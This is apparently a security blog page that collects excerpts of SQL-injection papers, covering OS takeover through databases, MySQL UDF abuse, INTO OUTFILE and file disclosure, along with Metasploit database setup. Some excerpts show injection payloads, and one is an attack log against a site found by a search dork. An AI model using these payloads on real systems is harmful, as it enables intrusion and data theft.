0x50sec.org

From:http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-slides.pdf

Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
bernardo.damele@gmail.com
April 10, 2009

This white paper discusses the security exposures of a server that occur due to a SQL injection flaw in a web application that communicate with a database.
Over ten years have passed since a famous hacker coined the term SQL injection and it is still considered one of the major application threats.A lot has been said on this vulnerability, but not all of the aspects and implications have been uncovered, yet.
This paper aim is to collate some of the existing knowledge, introduce new techniques and demonstrate how to get complete control over the database management system’s underlying operating system, file system and internal network through a SQL injection vulnerability in over-looked and theoretically not exploitable scenarios.

Contents
I Introduction
1 SQL injection
2 Web application scripting languages
2.1 Batched queries
3 Batched queries via SQL injection
3.1 MySQL
3.2 PostgreSQL
3.3 Microsoft SQL Server

II File system access
4 Read access
4.1 MySQL
4.2 PostgreSQL
4.3 Microsoft SQL Server
5 Write access
5.1 MySQL
5.2 PostgreSQL
5.3 Microsoft SQL Server
III Operating system access
6 User-Defined Function
7 UDF injection
7.1 MySQL
7.1.1 Shared library creation
7.1.2 SQL injection to command execution
7.2 PostgreSQL
7.2.1 Shared library creation
7.2.2 SQL injection to command execution
8 Stored procedure
8.1 Microsoft SQL Server
8.1.1 xp_cmdshell procedure
8.1.2 SQL injection to command execution

IV  Out-of-band connection
9 Stand-alone payload stager
9.1 Payload stager options
9.2 Session
10 SMB relay attack
10.1 Universal Naming Convention
10.2 Abuse UNC path requests
10.2.1 MySQL
10.2.2 PostgreSQL
10.2.3 Microsoft SQL Server

11 Stored procedure buffer overflow
11.1 Exploit
11.2 Memory protection
11.3 Bypass DEP

V Privilege escalation
VI Conclusion
12 Acknowledgments
阅读全文…

The Operation Outbreak Attack

From:http://www.exploit-db.com/papers/15833/

|=——————————————————————–=|
|=—————-=[ The Operation OutBreak Attack ]=—————–=|
|=————————–=[ 26 Dec 2010 ]=————————-=|
|=———————-=[  By CWH Underground  ]=——————–=|
|=——————————————————————–=|

######
Info
######

Title    : The Operation OutBreak Attack
Author    : ZeQ3uL  (Prathan Phongthiproek)
Retool2 (Suttapong Wara-asawapati)
Team    : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Website    : www.citecclub.org
Date    : 2010-12-26

##########
Contents
##########

[0x00] – Introduction

[0x01] – OutBreak Web Application

[0x02] – OutBreak MySQL Database

[0x03] – OutBreak with Autosploit.rc

[0x04] – Outbreak to Internal Server

[0x05] – References

[0x06] – Greetz To

#######################
[0x00] – Introduction
#######################

Hi all, in this paper, we will show you my hacking method (Logs) from real world case study on some company.
Moreover, we also show the ways to use the Best Exploitation tool, Metasploit Framework (Thank HD Moore and Rapid7) that powerful than day in the past with many exploit and auxiliary (We will see it ;D)

We recommend to read previous paper “The Operation Cloudburst Attack” that guide you about methods to hacking with Metasploit Framework.

###################################
[0x01] – OutBreak Web Application
###################################

First, I use nmap for scan open port on target and found information below
阅读全文…

Metasploit with MYSQL in BackTrack 4 r2
From:http://hi.baidu.com/p3rlish/blog/item/de16d790f29e749fa977a4a3.html
Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.
root@bt:~# msfconsole

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ —-=[635 exploits - 316 auxiliary
+ ----=[215 payloads - 27 encoders - 8 nops
=[svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3

We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.
msf > db_driver mysql
[*] Using database driver mysql
msf >/etc/init.d/mysql start
[*]exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*]    Usage: db_connect @/
[*]       OR: db_connect -y[path/to/database.yml]
[*] Examples:
[*]        db_connect user@metasploit3
[*]        db_connect user:pass@192.168.0.2/metasploit3
[*]        db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3
阅读全文…

来源:http://hi.baidu.com/ylbhz

Linux平台下 MYSQL用户自定义函数(UDF)的利用

Chris Anley [chris@ngssoftware.com] 5th July 2004

根据MySQL函数族的可扩展机制，意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数，简称udf

通过CREATE FUNCTION语句来实现这一机制,同时通过向’mysql.func’表录入信息来加载他们.

通常当MYSQL加载这些动态库时，该动态库文件路径必须能被MYSQL访问.

攻击者会滥用这一机制别有用心地创建一些“恶毒”的动态库文件并将它们通过SELECT … INTO OUTFILE语句写入可用的目录.当这些文件创建成功过后，攻击者通过insert向mysql.func表录入信息以配置MYSQL加载这些动态库文件和执行这些函数。

下面是一段相当简单的UDF链接库的代码 (请原谅他很简陋)（老外真有礼貌！）:
阅读全文…

浅谈Local File Disclosure漏洞的利用
本文首发黑防1003期，版权归作者和黑防所有，未经允许请勿转载。
hackerxwar [0x50sec]
文件泄露漏洞就是允许我们查看原本不能查看的有权限访问的任意文件文件，如php文件的源代码，保存数据库帐号和密码的连接文件，服务器的帐号信息文件、配置文件，等等。由此导致了严重的安全问题。比如知道了mysql数据库的帐号信息可以尝试登录mysql，或者phpmyadmin等，继而直接into outfile一个shell，或者登录后台；读源代码也使黑盒的测试变成了白盒，更加方便入侵者查找其他漏洞，降低了入侵的难度。

导致文件泄露漏洞的原因和常见利用方法

导致文件泄露漏洞的原因无非就是readfile()、file_get_contents()、fopen()、file()、fgets()、fgetc()
等等文件操作函数的参数检查不严格导致的，此外还有mysql有file_priv权限的load_file()函数等。文件操作函数参数可能是用户直接GPC输入的数据，也可能是数据库里保存的文件路径等。
关于lfd的利用其实就是读文件，常见的有：
如果后台登录密码写在配置文件里，直接读密码进后台
读mysql数据库连接文件，尝试登录mysql或phpmyadmin
对于mysql4.x的版本可以查看表名和数据库名等配合sql注射
读取/etc/passwd文件、数据库密码等等，配合社会工程学尝试登录ftp、网站后台等等
还有就是通过读php文件源代码来挖掘别的漏洞

但是有些情况下读文件也不是很顺利，这里就浅谈一下这些情况，就当抛砖引玉。

阅读全文…

/================================================================================\
———————————[ PLAYHACK.net ]———————————
\================================================================================/

-[ INFOS ]———————————————————————–
Title: “MySQL: Secure Web Apps – SQL Injection techniques”
Author: Omni
Website: http://omni.playhack.net
Date: 2009-02-26 (ISO 8601)
———————————————————————————

-[ SUMMARY ]———————————————————————
0×01: Introduction
0×02: Injecting SQL
0×03: Exploiting a Login Form
0×04: Exploiting Different SQL Statement Type
0×05: Basic Victim Fingerprinting
0×06: Standard Blind SQL Injection
0×07: Double Query
0×08: Filters Evasion
0×09: SQL Injection Prevention
0×10: Conclusion
———————————————————————————

阅读全文…

大家好我是xxx,闲着无聊找个网站练练手，请出google “inurl:php？id=80 site：XXX 关键字”
很快找到一个有漏洞的网站：

http://www.hacked.cn/autocar/show.php?id=42

加”‘”，网页部分内容消失。and 1=1 正常;and 1=2消失。存在注入漏洞，好就件捡软柿子捏！
判断mysql版本:
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=4正常
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=5不正常。
order by 1；order by 2正常，order by 3不正常。字段2个。
检测基本信息:
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(@@version,0x3a,database(),0x3a,user()),2
阅读全文…

From:http://www.milw0rm.com/papers/372
o00000000000000000000000000000000000000000000000000000o [!] Paper about:
8 .o8 8 INTO OUTFILE (Mysql)
8 “888 8 [!] Athor: xados
8 oooo ooo .oooo. .oooo888 .ooooo. .oooo.o 8 [!] Contact:
8 `88b..8P’ `P )88b d88′ `888 d88′ `88b d88( “8 8 xados@hotmail.it
8 Y888′ .oP”888 888 888 888 888 `”Y88b. 8 [!] Thnaks to:
8 .o8″’88b d8( 888 888 888 888 888 o. )88b 8 Johannes Dahse
8 o88′ 888o `Y888″”8o `Y8bod88P” `Y8bod8P’ 8″”888P’ 8 becouse this
8 8 paper is from
8 8 his mind.
o00000000000000000000000000000000000000000000000000000o ~ ~ ~

[+1] The FILE privilege

If we want to read or write to files we have to have the FILE privilege.
First see wich user we are in db with code:

0′ UNION SELECT current_user,null /*

you can put current_user or user() or system_user

This will give us the username@server. //(normally ..@localhost)
阅读全文…

简单翻译整理

http://www.milw0rm.com/papers/372

关于MySQL into outfile的条件很多人都总结过
1.web服务与MySQL运行在同一台服务器上
2.MySQL版本在3以上
3.有file_priv权限
4.magic_quotes=off
5.知道可写的web路径
laod_file()条件4不需要满足，但也需要路径。

对into outfile第四个条件往往在新的站中很难满足，第5个条件有时候也不容易满足。
这里主要讨论web路径的获得
milw0rm.com有一篇文章http://www.milw0rm.com/papers/372
阅读全文…